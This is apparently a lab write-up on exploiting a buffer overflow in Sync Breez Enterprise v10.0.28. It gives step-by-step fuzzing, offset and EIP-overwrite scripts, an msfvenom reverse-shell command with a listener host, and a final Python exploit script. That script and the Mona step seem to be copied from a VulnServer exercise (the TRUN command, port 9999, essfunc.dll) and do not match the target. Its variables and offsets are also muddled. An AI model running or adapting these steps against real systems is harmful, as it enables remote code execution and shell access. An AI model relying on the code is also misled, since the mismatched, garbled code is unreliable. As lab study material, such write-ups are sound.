Sync Breez Enterprize

Sync Breez Enterprize v10.0.28

1. Initial Reconnaissance

  • Port Scanning:

    sudo nmap <IP>

    Identify open ports. In this case, port 80 is open.

  • Discover Service and Version: Open Firefox, visit the HTTP page, and find the service version:

    Sync Breez Enterprise v10.0.28

  • Discover Communication Method: Use Wireshark to capture communication between your machine and the server in a local lab.

2. Fuzzing

  • Simulation: Python script to simulate communication and fuzz the application for potential vulnerabilities.

    # Fuzzing Script
while True:
    payload = "username=" + 'A' * c + "&password=1234"
    request = "POST /login HTTP/1.1\r\n" + "...other headers...\r\n" + payload
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.1.4", 80))
    s.send(request.encode())
    s.close()
    c += 100
    time.sleep(5)

3. Finding the Offset

  • Generate a pattern using Metasploit's pattern_create.rb:

    /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000

  • Use this pattern in the script and find the offset:

    offset = ""  # Paste the pattern generated by pattern_create.rb

4. Overwriting the EIP

  • Use a payload script with the EIP overwritten:

    # Example payload with EIP set to 42424242
shellcode = "A" * 2003 + "B" * 4 + "\x42\x42\x42\x42" + "C" * (3000 - 2003 - 4)

5. Finding Bad Characters

  • Generate a payload to identify bad characters:

    # Example payload for finding bad characters
badchars = "\x01\x02\x03\x04\x05..."  # List of all possible characters

6. Finding the Right Module

  • Use Mona to find modules and identify JMP ESP addresses:

    !mona modules
!mona find -s "\xff\xe4" -m essfunc.dll

7. Generating Shellcode

  • Use MSFVenom to generate shellcode:

    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f c

8. Gaining Root

  • Update the Python script with the generated shellcode and listen for the connection using Netcat.

# Final script
import sys, socket
from time import sleep

overflow = b"\xb8\x5c\x1e\x35\x96\xd9..."  # Generated shellcode
shellcode = b"A" * 2003 + b"B" * 4 + b"\x42\x42\x42\x42" + b"\x90" * 16 + overflow

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.4.104', 9999))
    payload = b"TRUN /.:/" + shellcode
    s.send(payload)
    s.close()
except:
    print("Error connecting to the server")
    sys.exit()
PreviousVulnServerNextCrashed CTF

Last updated